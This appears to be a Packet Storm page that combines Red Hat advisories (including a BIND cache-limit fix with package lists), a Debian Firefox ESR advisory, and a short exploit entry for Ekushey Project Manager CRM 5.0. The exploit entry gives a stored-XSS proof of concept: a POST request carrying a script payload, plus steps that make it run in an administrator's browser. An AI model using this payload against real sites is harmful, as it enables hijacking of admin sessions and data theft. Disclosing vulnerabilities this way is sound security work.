-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrSWdAAoJENzjgjWX9erEM3UP/Rf674dWIw9YaCZxiPbOoEJY  
0fimAliiJFaLpm2yK2Uff/33t0XEjbyh83X65+DzOzZH+5xvBJgpz7iMcqqc5pYo  
Hch2DPBCEl9fVY9lwT2SWOOWou3YMenV5fxTQ4PoDsSP7EMTqa/kt46nlOrnTb5c  
d7fhMpyc9zHetYpYrROeJ6GlvGDTSDIpom+WceakyymDPNxiwC9CjpdIwNu1P5x/  
APx6ruj2VRqeQCU9cYmFE4ohY/gs/+u+65cRXojBBxsRD5GKH06/lq7VwI09ELeP  
md2pxIOMdpbpVGUvk4HRePqt90LHGLDgpmB9dZrj6Mf+l3YHXewLvM08aorCya9B  
v/f08dzWEG3gtzDCXuy84yFFGqzF1zWK/F5bKU9JsyYpUN4P4knQkh3WxYCTqc79  
qmu8bFi3vmpapRQGizW0ppDE+wJQI/CmNZLomdDaPANvIeksdjTwGCkc1ralAwv4  
AyNraBVgJw6ncU6mznq6QwcT4ho9Hy6T2YhvSBKoTGj3IsRN2Pl4YrWN12VBw4cK  
/EOApCOPYwwTySNRosWWy9tGc+vv8Ih6X8PgQilLk6j/ruFdohUKBkrPXp+ZZBJ3  
zwPFDtdBvEhVi1puwmgx5JN1Qh3BxmdfSDDDVZcRyyTqjom0Jm3uOBjE4cJzTqu7  
sh0RLAVF6yjVOSTFslnZ  
=y/bj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4022-01

Debian Linux Security Advisory 5450-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5450-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
July 07, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-37201 CVE-2023-37202 CVE-2023-37207 CVE-2023-37208   
                 CVE-2023-37211

Multiple security issues have been found in the Mozilla Firefox web  
browser, which could potentially result in the execution of arbitrary  
code or spoofing.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 102.13.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 102.13.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSoTqMACgkQEMKTtsN8  
Tjb94A/7BrYQvYvuqkqEi7jG9+SLWXR3DeT+FE9Pkt23nPf0W/6zq0BE1lPt2csU  
wOL5Gu4fJuoWIDoQWeVMhYqapAZqxxkzSctV2JVOW7J5sf+gfsGBvKZ+yUAKX6AJ  
V7AoEAi2yUrWWFNVBiViJXLFeoe6UK/gxGDRu9MCfIM2JguMEguLVz3pIQlPgyrv  
87BPgMHHrcYalu8YBAH5SCeskXaCmXP1NkQ0juZZE8Rorfy9k44jTw6gqUCidmbJ  
hzL2lj035LU+IXKMVO2azGwnLHPQu1wbX7THQXUVSU0uov0WVEXqtf4QJd/ETnSx  
syJKPxXL8xOdL7pM/DIsOfg1mkVogsWS/CVYfU/ain/v0l9lyn5lN0nsIJwHO670  
hY/IM+d3Juz2kjmQ3cF7KcxCi3G7aYxzwvTBpCFGdjGvJ5Tj4RlMfuLgkk+bvZty  
eD2DXQSmQUcWzLjRLz/rz0wBix+76z2fVvOZSBK/SR699kHNs3dLA9AdnbLOig2q  
Dc/FYHT9E/QphcHrKiZhroZFp4wcAsqh3Jm4qG8J7UEc0MApG3f8ct+J/B24MHqn  
F+6UOA/8lGG45uVrdhhKswvN0NrDn5Fv3mreE6DiIr5V2m9fdiQLE6IDctnk+bec  
QsEoFM8xGLaEJWrbJ4KFbzwy0ss8xlbuTEsGvEP0Zp8Xq30Is7U=  
=A7kU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5450-1

Red Hat Security Advisory 2023-4005-02 - The Berkeley Internet Name Domain is an implementation of the Domain Name System protocols. BIND includes a DNS server ; a resolver library ; and tools for verifying that the DNS server is operating correctly.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: bind security update  
Advisory ID:       RHSA-2023:4005-02  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4005  
Issue date:        2023-07-10  
CVE Names:         CVE-2023-2828   
=====================================================================

1. Summary:

An update for bind is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain  
Name System (DNS) protocols. BIND includes a DNS server (named); a resolver  
library (routines for applications to use when interfacing with DNS); and  
tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind: named's configured cache size limit can be significantly exceeded  
(CVE-2023-2828)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, the BIND daemon (named) will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2216227 - CVE-2023-2828 bind: named's configured cache size limit can be significantly exceeded

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
bind-9.16.23-1.el9_0.2.src.rpm

aarch64:  
bind-9.16.23-1.el9_0.2.aarch64.rpm  
bind-chroot-9.16.23-1.el9_0.2.aarch64.rpm  
bind-debuginfo-9.16.23-1.el9_0.2.aarch64.rpm  
bind-debugsource-9.16.23-1.el9_0.2.aarch64.rpm  
bind-dnssec-utils-9.16.23-1.el9_0.2.aarch64.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.aarch64.rpm  
bind-libs-9.16.23-1.el9_0.2.aarch64.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.aarch64.rpm  
bind-utils-9.16.23-1.el9_0.2.aarch64.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.aarch64.rpm

noarch:  
bind-dnssec-doc-9.16.23-1.el9_0.2.noarch.rpm  
bind-license-9.16.23-1.el9_0.2.noarch.rpm  
python3-bind-9.16.23-1.el9_0.2.noarch.rpm

ppc64le:  
bind-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-chroot-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-debuginfo-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-debugsource-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-dnssec-utils-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-libs-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-utils-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.ppc64le.rpm

s390x:  
bind-9.16.23-1.el9_0.2.s390x.rpm  
bind-chroot-9.16.23-1.el9_0.2.s390x.rpm  
bind-debuginfo-9.16.23-1.el9_0.2.s390x.rpm  
bind-debugsource-9.16.23-1.el9_0.2.s390x.rpm  
bind-dnssec-utils-9.16.23-1.el9_0.2.s390x.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.s390x.rpm  
bind-libs-9.16.23-1.el9_0.2.s390x.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.s390x.rpm  
bind-utils-9.16.23-1.el9_0.2.s390x.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.s390x.rpm

x86_64:  
bind-9.16.23-1.el9_0.2.x86_64.rpm  
bind-chroot-9.16.23-1.el9_0.2.x86_64.rpm  
bind-debuginfo-9.16.23-1.el9_0.2.x86_64.rpm  
bind-debugsource-9.16.23-1.el9_0.2.x86_64.rpm  
bind-dnssec-utils-9.16.23-1.el9_0.2.x86_64.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.x86_64.rpm  
bind-libs-9.16.23-1.el9_0.2.x86_64.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.x86_64.rpm  
bind-utils-9.16.23-1.el9_0.2.x86_64.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
bind-debuginfo-9.16.23-1.el9_0.2.aarch64.rpm  
bind-debugsource-9.16.23-1.el9_0.2.aarch64.rpm  
bind-devel-9.16.23-1.el9_0.2.aarch64.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.aarch64.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.aarch64.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.aarch64.rpm

ppc64le:  
bind-debuginfo-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-debugsource-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-devel-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.ppc64le.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.ppc64le.rpm

s390x:  
bind-debuginfo-9.16.23-1.el9_0.2.s390x.rpm  
bind-debugsource-9.16.23-1.el9_0.2.s390x.rpm  
bind-devel-9.16.23-1.el9_0.2.s390x.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.s390x.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.s390x.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.s390x.rpm

x86_64:  
bind-debuginfo-9.16.23-1.el9_0.2.i686.rpm  
bind-debuginfo-9.16.23-1.el9_0.2.x86_64.rpm  
bind-debugsource-9.16.23-1.el9_0.2.i686.rpm  
bind-debugsource-9.16.23-1.el9_0.2.x86_64.rpm  
bind-devel-9.16.23-1.el9_0.2.i686.rpm  
bind-devel-9.16.23-1.el9_0.2.x86_64.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.i686.rpm  
bind-dnssec-utils-debuginfo-9.16.23-1.el9_0.2.x86_64.rpm  
bind-libs-9.16.23-1.el9_0.2.i686.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.i686.rpm  
bind-libs-debuginfo-9.16.23-1.el9_0.2.x86_64.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.i686.rpm  
bind-utils-debuginfo-9.16.23-1.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2828  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrH0RAAoJENzjgjWX9erEZeEQAI/8Gy/w//ml60DMLODaDzQq  
Hg6fpTYkaSeztG+ryQNqz1uPvJIwhhSDxbONGeSZlA80IG1FEDj6mVfkFXUYbVLr  
b2zGnOw3WnBO6Ad23BNKWsxxzxzDq6CRg1G9//X1iwLf7IF0eVIlHHSkHd/GcMcg  
mluxzK7TWnSFDcS4n335G6Ch25Voea4OCGoQT8kLyD+CZIQET20BSy91fVbqfVVe  
ZJOo3nYUq6YHvn/G1ymXRj4moaDddq6TUgbHLD/zLa7Ky0mk7tsfTCIwQTb5yTuJ  
yCpEZkX5kHt/tvVvnfx7EBGuCFOzw4efoGdlFCBWjHt69IB8cwFLsYkIK+N+MheZ  
1VgBUrg+Bp1NOjpzF4gPH8NHbDJHaAJlvMP8+SweTpHIiH1nl2WNQ3i/SpfsGcWt  
G2ZcHGNjQHx3ceDsl2/HvdfxY+yjusfevr54xh8uaY8sWGdf5FcQ3gin0IqG8wWQ  
DUbXleaTVzDXlYe3zx5Xx3CPt4lRfyDQy8O8z/GIQSxn3zZZHnnhuLOXRBvDTfy+  
z+ZDC7NcaMZAueZJ4B49retieVp6BUVBv3fB5CbSySp2lg1INgb8tyX0jErmxdqG  
S7ckKdhW3lsmmPmq9pu3u5zblBErVGvUlOuovjDwUEwNJy71oHb39o0R1dgaKZkE  
xG6s4sK2lbZpR1Zck9iU  
=nSwQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4005-02

Ekushey Project Manager CRM version 5.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Ekushey Project Manager CRM 5.0 - Stored XSS# Exploit Author: CraCkEr# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/ekushey/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /ekushey/index.php/client/message/message_read/xxxxxxxx[random-msg-hash]POST parameter 'message' is vulnerable to XSS-----------------------------------------------POST /ekushey/index.php/client/message/send_reply/8c8936d3 HTTP/2-----------------------------------------------Content-Disposition: form-data; name="message"<script>alert(1)</script>-----------------------------------------------## Steps to Reproduce:1. Login as (Client)2. Go to [Message] on this Path: https://website/ekushey/index.php/client/message3. Select any Person to MSG (Clients or ADMINS]4. Inject your XSS Payload in [Replay Message]5. Send6. XSS Fired on Local Browser7. When ADMIN visit [Dashboard] or any section in Administration Panel on this Path : https://website/ekushey/index.php/admin/dashboard8. XSS Will Fire and Executed on his Browser[-] Done

Source

Packet Storm